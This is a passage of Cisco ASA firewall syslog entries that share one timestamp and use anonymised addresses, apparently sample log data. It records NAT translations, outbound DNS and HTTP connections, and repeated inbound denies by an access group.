(100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: 